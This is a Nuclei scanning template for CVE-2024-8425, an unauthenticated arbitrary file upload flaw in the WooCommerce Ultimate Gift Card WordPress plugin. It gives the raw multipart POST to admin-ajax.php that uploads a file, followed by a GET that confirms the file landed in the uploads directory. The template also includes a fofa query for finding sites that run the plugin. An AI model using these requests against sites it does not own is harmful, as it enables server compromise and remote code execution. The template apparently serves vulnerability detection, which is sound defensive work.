The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
PoC代码[已公开]
id: CVE-2024-8425
info:
name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
author: jsnv-dev
severity: critical
description: |
The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
impact: |
Unauthenticated attackers can upload arbitrary files including PHP scripts to the server through insufficient file type validation, enabling remote code execution and complete server compromise.
remediation: |
Update WooCommerce Ultimate Gift Card plugin to a version later than 2.6.0 that addresses the arbitrary file upload vulnerability in the mwb_wgm_preview_mail and mwb_wgm_woocommerce_add_cart_item_data functions.
reference:
- https://github.com/KTN1990/CVE-2024-8425
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
- https://nvd.nist.gov/vuln/detail/CVE-2024-8425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8425
epss-score: 0.64114
epss-percentile: 0.98382
cwe-id: CWE-434
cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpswings
product: woocommerce_ultimate_gift_card
fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln
variables:
filename: "{{rand_base(7)}}.txt"
file_content: "{{randstr}}"
file_message: "{{randstr}}"
boundary_id: "{{rand_int(100000,999999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="mwb_wgm_preview_email"
test
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="tempId"
1
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="message"
{{file_message}}
------WebKitFormBoundary{{boundary_id}}
Content-Disposition: form-data; name="file"; filename="{{filename}}"
Content-Type: image/jpeg
{{file_content}}
------WebKitFormBoundary{{boundary_id}}--
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{file_message}}&name={{filename}}")'
condition: and
internal: true
- raw:
- |
GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{file_content}}"
- type: status
status:
- 200
extractors:
- type: kval
kval:
- file_content
# digest: 4b0a00483046022100d6b5d8411810e37287fb672f3006b24a84e19f91dc6dc06680d635be812739f70221009a3698f6dd9e6ad5e2223d8bb0b12284db08e7697f6a008df53deb50535b9deb:922c64590222798bb761d5b6d8e72950